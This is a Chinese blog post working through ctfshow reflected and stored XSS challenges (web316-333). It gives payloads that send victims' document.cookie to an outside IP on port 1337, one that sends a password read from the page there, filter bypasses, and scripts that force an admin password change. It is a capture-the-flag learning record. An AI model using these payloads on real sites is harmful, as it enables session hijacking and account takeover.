【Web】Ctfshow XSS刷题记录

目录

反射型XSS

①web316

②web317-319

③web320-322

④web323-326

存储型XSS

①web327

②web328

③web329

④web330

⑤web331

⑥web332-333


反射型XSS

①web316

直接输入<script>alert(1)</script>,能弹窗。xss题目一般会有个bot,可以触发你的xss代码。如果直接获取cookie只能拿到自己的,这里提示要拿到admin的。

payload:

复制代码
<script>window.open("http://124.222.136.33:1337/"+document.cookie)</script>

②web317-319

script被过滤了,无法弹出1,此时换标签进行尝试

payload:

复制代码
<body onload="window.open('http://124.222.136.33:1337/'+document.cookie)"></body>

③web320-322

过滤了空格,用/**/来替代

payload:

复制代码
<body/**/onload="window.open('http://124.222.136.33:1337/'+document.cookie)"></body>

④web323-326

过滤了iframe

payload:

复制代码
<body/**/onload="window.open('http://124.222.136.33:1337/'+document.cookie)"></body>

存储型XSS

①web327

payload:

复制代码
<body/**/onload="window.open('http://124.222.136.33:1337/'+document.cookie)"></body>

②web328

payload:

复制代码
<script>window.open("http://124.222.136.33:1337/"+document.cookie)</script>

管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码,从而获得admin的payload

拿到admin的cookie

改一下cookie看到flag

③web329

这里的是管理员在点击过js后立马登出,它的cookie一直是无效的,我们这里获取的话可以去获取它的用户名和密码

密码在layui-table-cell laytable-cell-1-0-1类中,可以用getElementsByClassName来获取

payload:

复制代码
<script>window.open('http://124.222.136.33:1337/'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

④web330

发现多了一个修改密码的界面

先自己随便注册登陆再修改密码抓包看看

确定payload:

复制代码
<script>window.location.href='http://127.0.0.1/api/change.php?p=admin';</script>

直接用admin admin登录,下面就可以为所欲为了

⑤web331

修改密码抓个包发现是以post方法提交

这里用Ajax提交post请求

payload:

复制代码
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'admin'}});</script>

用admin admin登录即可

⑥web332-333

这俩题是支付逻辑漏洞,这里不多赘述

相关推荐
蓝婷儿3 分钟前
每天一个前端小知识 Day 28 - Web Workers / 多线程模型在前端中的应用实践
前端
琹箐4 分钟前
Ant ASpin自定义 indicator 报错
前端·javascript·typescript
小小小小小惠8 分钟前
Responsetype blob会把接口接收的二进制文件转换成blob格式
前端·javascript
爱电摇的小码农8 分钟前
【深度探究系列(5)】:前端开发打怪升级指南:从踩坑到封神的解决方案手册
前端·javascript·css·vue.js·node.js·html5·xss
kymjs张涛33 分钟前
零一开源|前沿技术周报 #7
android·前端·ios
寻觅神话0635 分钟前
Android 应用常见安全问题
安全·android安全·owasp masvs
车载测试工程师38 分钟前
汽车功能安全-嵌入式软件测试(软件合格性测试)【目的、验证输入、集成&验证要求】11
功能测试·网络协议·测试工具·安全·车载系统·汽车·测试覆盖率
爱编程的喵38 分钟前
React入门实战:从静态渲染到动态状态管理
前端·javascript
DKPT42 分钟前
Java设计模式之行为型模式(责任链模式)介绍与说明
java·笔记·学习·观察者模式·设计模式
Tttian6221 小时前
npm init vue@latestnpm error code ETIMEDOUT
前端·vue.js·npm